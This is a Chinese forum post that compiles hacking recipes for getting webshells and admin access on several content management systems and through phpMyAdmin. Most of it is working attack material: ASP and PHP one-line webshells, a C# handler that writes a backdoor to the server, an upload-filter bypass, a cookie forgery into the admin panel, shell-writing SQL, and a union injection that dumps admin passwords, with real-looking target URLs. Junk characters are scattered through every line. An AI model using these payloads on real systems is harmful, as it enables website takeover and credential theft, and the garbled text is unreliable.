- E% W* _0 P& v' U2 t7 w<input type="file" name="NewFile" size="50"><br>
3 s& l& Y, F* e/ H" j<input id="btnUpload" type="submit" value="Upload">
$ b/ j* ]2 g( t, p</form>
4 ]$ h( y6 V& p; ?3 F7 {6 s-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------( v: Y! ]% L) l+ c5 N( I
1 }7 p0 X' C/ a2 A8 x7 R5 u pSDcms 后台拿webshell2 f5 [+ y% D, q" b6 K. B
7 {2 D. Q, C+ m& e& `! C) Y) _0 m9 J
第一种方法:
7 {" {) i' O5 v# E$ B进入后台-->系统管理-->系统设置-->系统设置->网站名称;
9 Q. N; T; ^' Z; a' o6 c把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx/ r }4 d% _9 @7 o; K6 [
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。' y) ?: ], k4 R9 c; o4 m% L! V
第二种方法:' L) M4 D" j9 l7 M7 |! `1 o& k* _4 [
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
( ?% C6 n! U- v在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!1 b R1 I0 A |. R
第三种方法:
0 |8 l7 p" q7 l0 t进入后台-->界面管理-->模板文件管理-->创建文件
: Z1 X! U5 L. I; ~2 `( X- X文件名写入getshell.ashx' h3 {7 L) k+ o, F! O
内容写入下面内容:8 w0 i# b! F9 o4 k
/====================复制下面的=========================/; _" D: T4 c N! s; H
<%@ WebHandler Language="C#" Class="Handler" %>2 O, f' p) R) X. p& S
using System;
6 B( v; ]/ ?* r' t gusing System.Web;% |- O, ]% u/ E( q2 v
using System.IO;+ U. d, G# W. o6 V* t
public class Handler : IHttpHandler {
( e) }" r! Y" W% hpublic void ProcessRequest (HttpContext context) {
- V6 ^- C6 Z! K! U9 G7 m) econtext.Response.ContentType = "text/plain";
) Y/ H9 O$ ?7 [; C- f0 h4 vStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));- v1 I4 v/ R: s. S
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");( }! f+ V/ _$ k, {- @$ u
file1.Flush();" S2 S! g& r- p- P. Q' N) o
file1.Close();
$ M! d9 E' m6 |* B" X" g4 I}
: e) p& _5 V1 B4 u* C" n+ B( Hpublic bool IsReusable {' y6 ?: z. V6 s' `, N
get {
! e+ |* L, }8 E) d& ^return false;! M# v9 ]' T8 i; b9 N
}
1 f8 }( J) v4 j}; f3 G% r% Z* w2 P' f) I
}
" f8 T/ q* N9 @/=============================================/& y& a% T. x( ?" u. E1 B
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx( P1 i! I+ T. P ~, W6 K. P) E; m" z
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
) I8 M: e4 J! u7 R-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 g* {' b9 ] _+ Y) \3 K1 T% E7 u/ ]" v* P
: F) S0 ]& A& i" c& nESCMS网站管理系统0day
; Z0 t4 E+ Y, L9 Q9 F, x2 s& g. ^4 U7 Y4 ~; Y, G4 T
后台登陆验证是通过admin/check.asp实现的
. ~( B- K& s$ b b4 j" h! Z
, j$ p" @/ l( }9 c1 L首先我们打开http://target.com/admin/es_index.html' r# \& A, H8 {6 i
然后在COOKIE结尾加上
4 d: }5 G7 n( g6 P# D8 w o+ @! u; ESCMS$_SP2=ES_admin=st0p;3 z, P" C4 `( M9 G
修改,然后刷新3 _+ `1 p3 C, f2 K5 T# [+ t
进后台了嘎..8 W- b* j! d! G/ Z3 E
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
7 P/ x8 D1 e+ U u/ `5 s
- g" l9 T z& I$ [! v利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.) T5 P- i* F) _& D; o9 j5 S* C& r
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp$ S8 n; e7 B5 e$ I: R* d8 }! {4 n& R
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..% ?* a' b m8 B. C% y( r9 o
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
! [& t* }2 t- b8 a------------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 A: R7 i, i. A/ Z5 ~
! Y* M5 C) C3 Y% q N2 }2 o2 y
宁志网站管理系统后台无验证漏洞及修复' u) X( T6 i y: g8 L
: U; I+ V! f8 t7 [' Y网上搜了一下,好像没有发布.如有雷同纯粹巧合!) M7 A& u8 X H* u- P) T; i
官方网站:www.ningzhi.net# f$ w$ u9 W7 h4 K" |: x
学校网站管理系统 V.2011版本
5 X$ o6 e* y" z7 Zhttp://down.chinaz.com/soft/29943.htm
! g6 k' G3 P* ^0 f2 O3 I其它版本(如:政府版等),自行下载.
4 H+ b$ s; C0 V漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
7 i/ B) ~8 U h3 V: xlogin.asp代码如下:5 P% ?" V8 x7 B3 H6 g# k& D8 C3 G
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> ; N O. t' ], y! T7 i$ z2 N' I
manage.asp代码我就不帖出来了.反正也没验证.( e) | h: n: X' r5 |% }
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
& V3 `0 y- M3 G+ [8 ]! H漏洞利用:. L' U& k' i$ j: m
直接访问http://www.0855.tv/admin/manage.asp0 e" X2 z* |0 n
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
0 \/ \# v5 g h5 R5 p----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 d/ X2 B8 H: A. C6 Q8 X8 L! g* z$ m/ b# r6 l
phpmyadmin拿shell的四种方法总结及修复! g! P, R1 }. w7 l, r0 C
; R8 a: v. f- o _; N
方法一:
# G5 Z) m7 s) G9 QCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
) Q. ?( o; |8 E$ @$ h* D6 oINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');) O4 U( l/ z( v- u9 x: Q! C7 s3 D: Y
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
$ a! \, b; H/ S# ?6 N----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php. s! ] ~! F% L* x. b1 |! `
一句话连接密码:7on
* D7 Q* r9 \6 C方法二:9 k/ v3 `6 P8 K( R) I e
读取文件内容: select load_file('E:/xamp/www/s.php');7 }6 b- O0 `- M* M- c7 e+ r# A2 Z! `
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'6 v1 S; G6 D- Y3 {8 y5 j
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'4 F8 V% ^& O9 Z; N
方法三:: ?0 s( z4 b6 s$ `* \; H
JhackJ版本 PHPmyadmin拿shell! q" ^' }4 f# d0 r2 j
Create TABLE study (cmd text NOT NULL);6 A$ c- P% ] _* b+ D3 x
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
; b. E' e' G, g: e7 M& j6 C2 nselect cmd from study into outfile 'E:/wamp/www/7.php'; z, t, M( K+ U1 p$ w
Drop TABLE IF EXISTS study;1 M+ p/ k( t' y8 n. L$ W
<?php eval($_POST[cmd])?>8 y0 V8 z( ]# i
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。 b! |+ A! c$ m& a2 n; E* I8 y# H" W4 X% R
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 11 d c" F6 Q) n: @3 k& X, Z
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
1 n8 B- i& X' _DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。! \( P! s1 V6 h. W# Y o, W
方法四:- E0 z9 x) {' N
select load_file('E:/xamp/www/study.php');
* N3 w4 x; L0 _4 Tselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
5 U" @2 ?- q6 a5 g2 Q然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
( M. i, s( d5 y* J; v-----------------------------------------------------------------------------------------------------------------------------------------------------------------------% f& O- ^. b k, J1 m, l
7 F# z# ]$ d$ \3 W4 o
NO.001中学网站管理系统 Build 110628 注入漏洞* Q u+ w# c$ I" n1 E' ?
" ]; m9 W2 _, e1 g8 t+ h3 l+ o4 V
NO.001中学网站管理系统功能模块:
$ Q2 t# D& n9 e8 H/ I1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
+ A$ V$ X3 o/ T8 e3 F1 G" `% W2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
" ]# W5 s5 w7 B9 f2 f$ a% t3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息8 b7 a; i; W1 r9 G0 O8 B
4.视频图片管理:一级分类,动态添加视频或者图片等信息
% j0 x8 M% v7 [% D9 f5.留言管理:对留言,修改,删除、回复等管理3 Z) s( B4 P4 O' m- Q8 S( z
6.校友频道:包括校友资料excel导出、管理等功能4 ~+ C% b; N: r3 E
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页0 b) p! J" G+ _' z" z# A
默认后台:admin/login.asp7 D% Q. H8 } Q: a
官方演示:http://demo.001cms.net6 R( w" d3 S# X
源码下载地址:http://down.chinaz.com/soft/30187.htm
8 _0 @6 _: P7 s! t) J9 p7 _: iEXP:
$ x5 f8 V7 K: B. y+ @( f3 runion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
, ~, h. P) L" j* D$ V& n4 K5 o测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin7 v. f; @ T, N* g6 ~
getshell:后台有备份,你懂的
* @; i0 ~# R8 s) [& p* v另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
# U u) U$ C) d. F" ~. [: D------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对